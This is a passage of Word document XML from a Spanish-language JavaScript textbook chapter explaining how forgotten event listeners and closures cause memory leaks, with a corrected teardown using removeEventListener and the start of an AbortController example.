        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  const pedidos = [];                        // puede crecer mucho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A97BB" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6BBA53" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  function alRecibirEvento(evento) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D7D061" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">    pedidos.push(evento.detail);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A61E4FE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">    panel.textContent = `${pedidos.length} pedidos`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389AB040" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21686822" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6FB4DF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  canalDeEventos.addEventListener("pedido", alRecibirEvento);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017AA4A9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  contenedor.appendChild(panel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590B8C1C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0AE82A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  return () =&gt; panel.remove();               // ← el desmontaje incompleto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7957F7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36308E3A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Mirá la última línea, porque ahí está todo: quita el panel de la pantalla, y ahí termina </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>la ilusión</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de haber desmontado. El manejador </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>sigue registrado en el canal de eventos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y, como es una clausura, mantiene vivos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>panel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>pedidos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y todo lo que ese arreglo contenga. Las consecuencias se acumulan y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ninguna da error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="34CE3134"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7FCD0555" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Lo que pasa de verdad</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77528BE8" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Por qué no te enterás</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="3BAB6570"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65425D59" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">El arreglo </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>pedidos</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>sigue creciendo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> con cada evento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E0407C8" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>No hay excepción ni advertencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="42D77C93"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95F551A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">El panel </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>sigue actualizándose</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> con el conteo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19509100" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Está fuera del documento: nadie lo ve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="7918EA04"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5FD2E97E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Entrar y salir veinte veces deja </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>veinte manejadores</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> sobre veinte paneles invisibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="39547BAA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>La pantalla se ve perfecta; la aplicación anda cada vez más lento</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BD6A3AC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:spacing w:line="20" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="9020" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9020"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="540BCDD2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="85" w:type="dxa"/>
              <w:bottom w:w="85" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0451E005" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BF76CC3" wp14:editId="7E143F51">
                  <wp:extent cx="5580000" cy="37092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4-4.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId10"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5580000" cy="3709248"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63E3DF5B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Epgrafe"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Figura 4.4. Cómo una clausura mantiene vivo un nodo removido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC9FBE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>En una página que recargás cada dos minutos no se nota. En una que se usa una hora por sesión —</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>como el panel de cocina del TPI, abierto todo el turno</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>— termina en una pestaña que consume gigabytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71891543" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc239320007"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.9.3 — La regla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="330191FE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Primero la fuga, después la regla. De ahí sale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>RN-F01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, que el TPI enuncia así:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A916B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="8" w:color="2E74B5"/>
        </w:pBdr>
        <w:ind w:left="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Toda llamada a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>subscribe()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> devuelve su función de baja; hay que guardarla y ejecutarla en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>destroy()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>disconnectedCallback()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, que es obligatorio. Ninguna suscripción se hace sin guardar su baja.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB98F09" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La versión correcta del ejemplo tiene </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>una línea más</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B12BF5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>function montarPanelDePedidos(contenedor) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F007D4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  const panel = document.createElement("div");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50694834" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  const pedidos = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203CADB" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168A16D7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  function alRecibirEvento(evento) { /* ... */ }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B0382" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E25E0E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  canalDeEventos.addEventListener("pedido", alRecibirEvento);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F1209" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  contenedor.appendChild(panel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A399AB" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474B0A04" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  return () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CC2494" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">    canalDeEventos.removeEventListener("pedido", alRecibirEvento);  // ← la baja</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A41589" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">    panel.remove();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB0575" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306D276E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668E7D34" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc239320008"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>El detalle que hace fracasar la mitad de las bajas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="0366105B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>removeEventListener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> exige exactamente la misma referencia de función</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se registró. No una equivalente: la misma. Una flecha escrita en el momento </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no se puede dar de baja</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E2C13" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el.addEventListener("click", () =&gt; hacerAlgo());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523DDDDF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el.removeEventListener("click", () =&gt; hacerAlgo());   // NO da de baja nada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A758F5A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Se ven idénticas y hacen lo mismo, pero son </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>dos funciones distintas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>. La segunda línea le pide al navegador dar de baja un manejador que nunca registró, y el navegador —sin decir nada— no hace nada. Por eso el manejador va en una variable o es una función con nombre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B093347" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc239320009"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9.4 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="2B0124DA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Con varias suscripciones, guardar cada baja por separado es fácil de olvidar — y con una que te olvides, la fuga existe. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> las da todas de baja de una:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF94FC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>const controlador = new AbortController();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333386ED" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>const { signal } = controlador;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC03D8" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FBC55D3" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>boton.addEventListener("click", alHacerClic, { signal });</w:t>
      </w:r>
    </w:p>
